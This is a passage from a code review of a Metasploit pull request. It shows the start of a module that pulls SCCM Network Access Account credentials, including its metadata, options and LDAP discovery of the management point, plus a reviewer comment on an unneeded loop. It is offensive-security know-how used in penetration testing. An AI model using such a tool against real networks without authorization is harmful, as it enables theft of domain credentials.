modules/auxiliary/admin/sccm/get_naa_credentials.rb

```diff
@@ -0,0 +1,461 @@
+        'Name' => 'Get NAA Credentials',
+        'Description' => %q{
+          This module attempts to retrieve the Network Access Account, if configured, from the SCCM server.
+          This requires a computer account, which can be added using the samr_account module.
+        },
+        'Author' => [
+          'xpn',     # Initial research
+          'skelsec', # Initial obfuscation port
+          'smashery' # module author
+        ],
+        'References' => [
+          ['URL', 'https://blog.xpnsec.com/unobfuscating-network-access-accounts/'],
+          ['URL', 'https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-2/cred-2_description.md'],
+          ['URL', 'https://github.com/Mayyhem/SharpSCCM'],
+          ['URL', 'https://github.com/garrettfoster13/sccmhunter']
+        ],
+        'License' => MSF_LICENSE,
+        'Notes' => {
+          'Stability' => [],
+          'SideEffects' => [CONFIG_CHANGES],
+          'Reliability' => []
+        }
+      )
+    )
+
+    register_options([
+      OptAddressRange.new('RHOSTS', [ false, 'The domain controller (for autodiscovery). Not required if providing a management point and site code' ]),
+      OptPort.new('RPORT', [ false, 'The LDAP port of the domain controller (for autodiscovery). Not required if providing a management point and site code', 389 ]),
+      OptString.new('COMPUTER_USER', [ true, 'The username of a computer account' ]),
+      OptString.new('COMPUTER_PASS', [ true, 'The password of the provided computer account' ]),
+      OptString.new('MANAGEMENT_POINT', [ false, 'The management point (SCCM server) to use' ]),
+      OptString.new('SITE_CODE', [ false, 'The site code to use on the management point' ]),
+    ])
+
+    @session_or_rhost_required = false
+  end
+
+  def fail_with_ldap_error(message)
+    ldap_result = @ldap.get_operation_result.table
+    return if ldap_result[:code] == 0
+
+    print_error(message)
+    if ldap_result[:code] == 16
+      fail_with(Failure::NotFound, 'The LDAP operation failed because the referenced attribute does not exist. Ensure you are targeting a domain controller running at least Server 2016.')
+    else
+      validate_query_result!(ldap_result)
+    end
+  end
+
+  def find_management_point
+    ldap_connect do |ldap|
+      validate_bind_success!(ldap)
+
+      if (@base_dn = datastore['BASE_DN'])
+        print_status("User-specified base DN: #{@base_dn}")
+      else
+        print_status('Discovering base DN automatically')
+
+        if (@base_dn = ldap.base_dn)
+          print_status("#{ldap.peerinfo} Discovered base DN: #{@base_dn}")
+        else
+          print_warning("Couldn't discover base DN!")
+        end
+      end
+      @ldap = ldap
+      raw_objects = @ldap.search(base: @base_dn, filter: '(objectclass=mssmsmanagementpoint)', attributes: ['*'])
+      return nil unless raw_objects.any?
+
+      raw_obj = raw_objects.first
+
+      raw_objects.each do |ro|
```

Comment:
Can you do anything with these objects?
feels like a needless loop over objects just to print out some information when you only use the first entry.

Reply:
makes sense to me, and thanks for explaining the reasoning behind this.